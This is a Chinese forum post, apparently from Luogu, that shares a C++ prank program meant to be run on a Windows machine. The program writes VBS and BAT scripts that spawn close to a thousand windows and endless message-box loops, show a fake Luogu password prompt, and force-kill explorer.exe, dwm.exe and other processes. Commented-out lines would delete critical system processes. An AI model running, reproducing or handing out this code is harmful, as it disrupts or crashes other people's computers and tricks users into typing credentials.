社区讨论
机房修好了,但是又发生了更加剧烈的爆炸
灌水区参与者 5已保存回复 6
讨论操作
快速查看讨论及其快照的属性,并进行相关操作。
- 当前回复
- 6 条
- 当前快照
- 1 份
- 快照标识符
- @m1w5kdfy
- 此快照首次捕获于
- 2024/10/05 20:50 去年
- 此快照最后确认于
- 2024/10/05 21:59 去年
终于有时间升级代码了!!!( ̄︶ ̄)↗
警告:不要轻易运行!!!
@nghd666666 上课运行这个被老师抓了
建议读懂代码在运行
或者把999改成其他的数字
taskmgr将拿下绝杀
CPP#include <bits/stdc++.h>
using namespace std;
int main(){
ofstream fout;
fout.open("ILIKELUOGU.vbs");
fout<<"set shell = Wscript.createobject(\"wscript.shell\")"<<endl;
fout<<"a=shell.run(\"ILIKELUOGU.bat\", 0)"<<endl;
fout.close();
fout.open("ILIKELUOGU.bat");
fout<<"start calc"<<endl;
fout<<"start https://www.luogu.com.cn/"<<endl;
fout<<"start https://www.bilibili.com/"<<endl;
fout<<"start https://poki.com/zh#utm_source=china"<<endl;
fout<<"start notepad"<<endl;
fout<<"winver"<<endl;
fout.close();
fout.open("Bearsinon.bat");
for(int i=1;i<=999;i++)
fout<<"start ILIKELUOGU.vbs"<<endl;
fout.close();
fout.open("Bearsinon.vbs");
fout<<"msgbox \"这是一个普通的程序\", 4096, \"Bearsinon\""<<endl;
fout<<"dim a"<<endl<<"a=1"<<endl;
fout<<"msgbox \"突然,程序发生了爆炸\", 4096, \"Bearsinon\""<<endl;
fout<<"while true"<<endl;
fout<<"msgbox \"\\^o^/\",4096+48+4,\"^_-\""<<endl;
fout<<"msgbox \"\Are you OK?\", 4096+48+4, \"^_-\""<<endl;
fout<<"Wend"<<endl;
fout.close();
fout.open("run.vbs");
fout<<"set shell = Wscript.createobject(\"wscript.shell\")"<<endl;
fout<<"dim k"<<endl;
fout<<"k=1"<<endl;
fout<<"while k<999"<<endl;
fout<<"k=k+1"<<endl;
fout<<"a=shell.run(\"Bearsinon.vbs\", 1)"<<endl;
fout<<"Wend"<<endl;
fout.close();
fout.open("ILOVELUOGU.bat");
fout<<"start Bearsinon.bat"<<endl;
fout.close();
fout.open("taskkill.bat");
int i=999;
while(i!=0) {
fout<<"start cmd.exe"<<endl;
i--;
}
fout<<"taskkill /f /im devcpp.exe /t"<<endl;
fout<<"taskkill /f /im dwm.exe /t"<<endl;
fout<<"taskkill /f /im explorer.exe /t"<<endl;
/*
//win7请食用下面这句
fout<<"wmic process where name=\"svchost.exe\" delete"<<endl;
//win10/11请食用下面这句
fout<<"wmic process where name=\"LsaIso.exe\" delete"<<endl;
//win8自己逝逝用哪一个
//不管用可以不用
*/
fout.close();
fout.open("taskkill.vbs");
fout<<"set shell = Wscript.createobject(\"wscript.shell\")"<<endl;
fout<<"dim k"<<endl;
fout<<"k=inputbox(\"Your luogu password\",\"Bearsinon\",\"Bearsinon\")"<<endl;
fout<<"Msgbox \"^_-\""<<endl;
fout<<"a=shell.run(\"taskkill.bat\", 0)"<<endl;
fout.close();
system("start run.vbs");
system("start ILOVELUOGU.bat");
system("start taskkill.vbs");
return 0;
}
mvp:taskmgr
回复
共 6 条回复,欢迎继续交流。
正在加载回复...